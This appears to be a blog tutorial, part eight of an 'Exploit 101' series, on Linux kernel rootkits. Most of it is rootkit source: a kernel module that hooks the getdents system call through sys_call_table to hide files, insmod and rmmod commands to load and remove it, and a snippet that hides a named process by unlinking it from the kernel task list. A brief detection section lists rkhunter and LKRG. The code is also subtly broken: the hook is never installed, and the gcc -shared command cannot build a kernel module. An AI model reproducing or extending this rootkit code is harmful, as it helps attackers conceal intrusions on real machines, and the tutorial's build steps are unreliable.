In this eighth part of our Exploit 101 series, we will explore Kernel Rootkits and Persistence, focusing on how attackers maintain access to a compromised system using stealthy kernel modifications.
What is a Kernel Rootkit?
A kernel rootkit is a type of malware that runs with kernel privileges, allowing it to:
- Hide processes, files, and network connections
- Intercept system calls and modify kernel behavior
- Provide persistent backdoor access
- Bypass security mechanisms like antivirus and monitoring tools
Kernel Rootkit Techniques
- Hooking System Calls – Modifying
sys_call_tableto intercept functions. - Direct Kernel Object Manipulation (DKOM) – Hiding processes by modifying kernel structures.
- Loadable Kernel Modules (LKM) Rootkits – Dynamically loading malicious kernel code.
- Network Backdoor Injection – Creating hidden network sockets.
- Filesystem Hiding – Concealing files and directories.
Setting Up a Rootkit Development Environment
Required Tools
- Kernel Headers (for compiling modules):
sudo apt install linux-headers-$(uname -r) - GDB & QEMU (for debugging):
sudo apt install gdb qemu-system-x86 - LKM Development Tools:
sudo apt install build-essential
Example 1: Hooking System Calls
Malicious LKM Code
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
unsigned long **sys_call_table;
static asmlinkage int (*original_sys_getdents)(unsigned int, struct linux_dirent *, unsigned int);
asmlinkage int hacked_sys_getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count) {
int nread = original_sys_getdents(fd, dirp, count);
return nread; // Modify this function to hide files
}
static int __init rootkit_init(void) {
sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");
original_sys_getdents = (void *)sys_call_table[__NR_getdents];
return 0;
}
static void __exit rootkit_exit(void) {
sys_call_table[__NR_getdents] = (unsigned long *)original_sys_getdents;
}
module_init(rootkit_init);
module_exit(rootkit_exit);
MODULE_LICENSE("GPL");
Compiling and Loading the Rootkit
gcc -o rootkit.ko rootkit.c -fPIC -shared
sudo insmod rootkit.ko
Check if it is loaded:
lsmod | grep rootkit
Remove the rootkit:
sudo rmmod rootkit
Example 2: Hiding a Process with DKOM
Modify process structures to hide a malicious process:
struct task_struct *task;
for_each_process(task) {
if (!strcmp(task->comm, "malicious")) {
list_del(&task->tasks);
}
}
Rootkit Detection and Mitigation
- Check for Hidden Modules:
sudo lsmod | grep suspicious_module - Scan for Rootkits using rkhunter:
sudo apt install rkhunter sudo rkhunter --check - Use Kernel Integrity Monitoring (LKRG)
sudo apt install lkrg
Conclusion
Kernel rootkits are dangerous and stealthy, allowing attackers to maintain persistent control. Defenders must use kernel integrity checks, system monitoring, and rootkit detection tools. In the next part, we will explore Windows Exploitation Basics.
Stay tuned for Exploit 101: Part 9 – Windows Exploitation Basics!

0 comments:
Post a Comment